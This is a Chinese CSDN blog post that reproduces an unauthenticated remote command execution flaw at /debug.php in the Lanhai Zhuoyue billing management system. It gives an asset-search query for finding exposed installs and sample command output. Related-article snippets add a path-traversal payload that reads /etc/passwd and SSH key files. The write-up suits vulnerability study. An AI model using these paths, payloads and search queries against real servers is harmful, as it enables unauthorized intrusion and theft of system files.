蓝海卓越计费管理系统 debug.php 远程命令执行漏洞

最新推荐文章于 2024-05-10 10:01:25 发布
最新推荐文章于 2024-05-10 10:01:25 发布
阅读量2.7k 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35938621/article/details/124247253
版权

漏洞描述

i ⭐蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行

漏洞影响

s ✅蓝海卓越计费管理系统

空间测绘

d ⭕Hunter:web.title="蓝海卓越计费管理系统"

漏洞复现

  • ✅访问首页

image-20220418131447557

  • ✅执行Payload命令,访问路径/debug.php
$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:21:9B:FB:30:27
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0
最低0.47元/天 解锁文章
孤桜懶契
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
蓝海卓越计费管理系统漏洞学习——download.php 任意文件读取漏洞
记录并分享学习安全的知识点..
10-02 455
蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件。
蓝海卓越计费管理系统 download.php 任意文件读取漏洞
千寻的博客
05-14 1842
文章目录漏洞名称漏洞描述影响版本fofa漏洞复现一第一步 访问系统第二步 查看漏洞点第三步 数据包重放,查看/etc/passwd第四步 数据包重放,查看/root/.ssh/authorized_keys摘抄 漏洞名称 蓝海卓越计费管理系统 download.php 任意文件读取漏洞 漏洞描述 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞, 攻击者通过 …/ 遍历目录可以读取服务器上的敏感文件 /download.php?file=…/…/…/…/…/etc/passwd
实战 - 蓝海卓越计费管理系统 debug.php 远程命令执行漏洞
HAKUNAMATATATTA的博客
05-30 376
蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行
蓝海卓越计费管理系统 debug.php_未授权RCE
soldi_er的博客
07-12 293
文章目录   Fofa搜索:title==“蓝海卓越计费管理系统”。   点开第一个搜索结果:   /debug.php未授权访问,文件提供一个命令执行的接口:   输入Poc验证:
蓝海卓越 计费管理系统 download.php 任意文件读取漏洞
weixin_46801402的博客
11-21 600
蓝海卓越 计费管理系统 download.php 任意文件读取漏洞
蓝海卓越计费管理系统任意文件读取批量检测脚本
06-16
-u 指定单个url -l 指定url文件 先用fofa搜索所有涉及蓝海系统的url,然后直接跑这个脚本就可以
毕业设计:基于PHP蓝海卓越宽带计费系统的WEB界面.zip
11-14
计算机毕设源码
蓝海卓越认证计费管理系统免费版使用说明.
12-24
蓝海卓越认证计费管理系统免费版使用说 明 很好的认证计费软件还是免费版的
蓝海卓越认证计费系统G90
01-14
蓝海卓越认证计费系统G90 一、配置PPPOE 拨号服务器,通过RADIUS 方式,将认证服务器地址指向本设备IP 地址 二、通过IP 地址访问计费管理服务器,可以从任意能访问该地址的网络上,对其进行访问。 三、登录管理界面...
蓝海卓越广电宽带认证计费系统.doc
12-01
蓝海卓越广电宽带认证计费系统.doc
php网络收费系统源码,需要的下
01-18
php收费系统源码, 默认解压密码:www.dai-ma.com
蓝海卓越计费管理系统远程命令执行
自强不息
07-30 337
活着,就要时刻准备承受磨难!
蓝海卓越计费管理系统任意文件读取
weixin_51387754的博客
05-19 399
注:互联网资产非授权请勿测试 Fofa搜索: title=“蓝海卓越计费管理系统漏洞利用 https://120.0.0.1:7788/download.php?file=…/…/…/…/…/etc/passwd 漏洞出现的⽂件为 download.php ,其中 file=参数用户可控 二.漏洞POC /download.php?file=../../../../../etc/passwd 漏洞修复 对下载路径进行过滤,如下载前对传入的参数进行过滤,并且对下载文件类型进行检查,是否是允许下载的类
php debug模式漏洞,新型php漏洞挖掘之debug导致的安全漏洞(Edusoho)
weixin_35308770的博客
04-10 413
【过年了,每天发一篇以前的存货,一共七篇。】现代cms框架(laraval/symfony/slim)的出现,导致现今的php漏洞出现点、原理、利用方法,发生了一些变化,这个系列希望可以总结一下自己挖掘的此类cms漏洞。今天这个漏洞是Edusoho的一个user表dump漏洞。首先,我简要说明一下漏洞原理。Edusoho开启调试模式以后将会在程序出错后输出debug信息,其中包括当前环境中所有变量...
this is a 计费管理系统
zonein小菜鸟的博客
03-29 988
计费管理系统c++版本数据结构:计费管理系统的主要功能:添加卡查询卡上机下机充值退费查询统计注销卡 个中不足也请大佬指正 代码风格混乱,喔会努力的 有一点bug 卡结构的累计金额在使用过程中未修改,请注意 数据结构: typedef struct Card //卡信息 { char aName[18]; // 卡号 char aPwd[18]; // 密...
天融信TopApp-LB 负载均衡系统漏洞总结
qq_17754023的博客
08-11 781
1、天融信负载均衡TopApp-LB系统无需密码直接登陆。3、天融信TopApp-LB 负载均衡系统Sql注入漏洞。app=“天融信-TopApp-LB-负载均衡系统”2、天融信TopApp-LB负载均衡命令执行漏洞。title=“TopApp-LB 负载均衡系统”1、使用poc::用户名随意 密码:;...
某购物商城系统commodtiy接口处存在任意文件上传漏洞
最新发布
weixin_43167326的博客
05-10 728
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
python蓝海商品
08-18
Python蓝海商品是指在Python编程领域中,有较少竞争但有潜力的商品或服务。这些商品或服务可以满足Python开发者的需求,帮助他们提高效率、解决问题或实现创新。以下是一些可能的Python蓝海商品的示例: 1. Python库或框架定制开发:根据特定需求开发定制的Python库或框架,为开发者提供更高效、更专业的解决方案。 2. 教育和培训服务:提供Python编程的培训课程、在线教育平台或个人指导,帮助初学者快速入门Python或帮助有经验的开发者提升技能。 3. 数据分析与可视化工具:开发用于数据分析和可视化的Python工具,帮助用户更好地理解和利用数据。 4. 自动化脚本开发:为企业或个人开发自动化脚本,帮助他们提高效率并简化重复性任务。 5. 数据科学平台:构建适用于数据科学家和分析师的Python平台,集成常用工具和库,并提供高效的数据处理、建模和可视化功能。 这些只是一些可能的Python蓝海商品示例,根据市场需求和个人创新,还有许多其他的机会等待发现和开发。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孤桜懶契

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值